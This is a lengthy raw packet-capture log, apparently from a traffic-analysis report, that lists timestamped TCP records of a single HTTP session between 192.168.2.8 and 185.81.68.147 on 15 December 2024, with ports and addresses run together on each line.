                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379344940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379430056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379432917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379709959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379755020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.379795074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.380569935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.380614996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.380670071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.381369114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.381414890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.381479025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.382210970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.382255077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.382328033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.383225918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.383270025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.383322954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.384035110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.384079933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.384141922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.384896040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.384936094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.385001898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.385828018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.385842085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.385865927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.386523008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.386559963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.386619091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.430816889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526016951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526072979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526194096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526304960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526426077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.526494980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527066946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527228117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527262926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527803898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527925014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.527956963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.528631926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.528747082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.528784037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.529478073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.529578924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.529616117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.531415939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.531429052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.531440973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.531452894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.531538010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532011032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532144070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532210112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532826900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532942057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.532979012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.533647060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.533736944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.533772945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.534459114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.534562111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.534599066 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.535306931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.535392046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.535460949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.536132097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.536262989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.536302090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.537051916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.537200928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.537240028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.537872076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538050890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538089037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538605928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538717985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538804054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.538871050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.539619923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.540060043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.540124893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542500973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542520046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542531967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542542934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542555094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542567968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542690039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.542690039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.543318987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.543333054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.543395042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544048071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544060946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544137955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544802904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544832945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.544878006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.545640945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.545727968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.545763969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.546385050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.546494007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.546531916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.547352076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.547612906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.547657967 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.550446033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551274061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551285982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551297903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551311016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551326990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551337957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551422119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551434994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551445961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551460981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551477909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551759005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551772118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.551817894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.552664042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.552815914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.552855015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.553277016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.553528070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.553577900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.554074049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.554212093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.554251909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.554934978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.555056095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.555136919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.555809975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.555946112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.556016922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.556684017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.556710005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.556754112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557276011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557435989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557473898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557895899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557955980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.557996988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.558655977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.558782101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.558820963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.559494019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.559650898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.559689999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.560352087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.560465097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.560503006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.561146975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572040081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572122097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572181940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572630882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572681904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.572771072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.573714018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.573765993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.573852062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.574479103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.574527979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.574626923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.575506926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.575556993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.575644970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.576328039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.576376915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.576468945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.577210903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.577229977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.577267885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.578208923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.578259945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.578310013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579078913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579125881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579220057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579611063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579670906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.579694986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.633958101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.718938112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.718966007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.719063997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.719089031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.719151020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.719217062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.719919920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.720078945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.720150948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.720993996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.721144915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.721209049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.722054958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.722106934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.722176075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.722764969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.722944975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.723009109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.723984957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.724143028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.724205971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.724848032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.724936008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.724997044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.725758076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.725861073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.725924969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.726521969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.726638079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.726703882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.727247953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.727305889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.727370024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.727982044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.728140116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.728207111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.728740931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.728820086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.728879929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.729579926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.729696989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.729763031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.730597019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.730782032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.730845928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.731710911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.731904984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.731971979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.732764006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.732974052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.733040094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.733517885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.733625889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.733686924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.734611988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.734883070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.734947920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.735594034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.735675097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.735739946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.736370087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.736462116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.736532927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.737157106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.737236977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.737312078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.737891912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.737972975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.738044024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.738658905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.738764048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.738836050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.739449978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.739593029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.739656925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.740161896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.740282059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.740350008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.740999937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.741077900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.741141081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.741695881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.741789103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.741853952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.742389917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:44.742506027 CET8049709185.81.68.147192.168.2.8
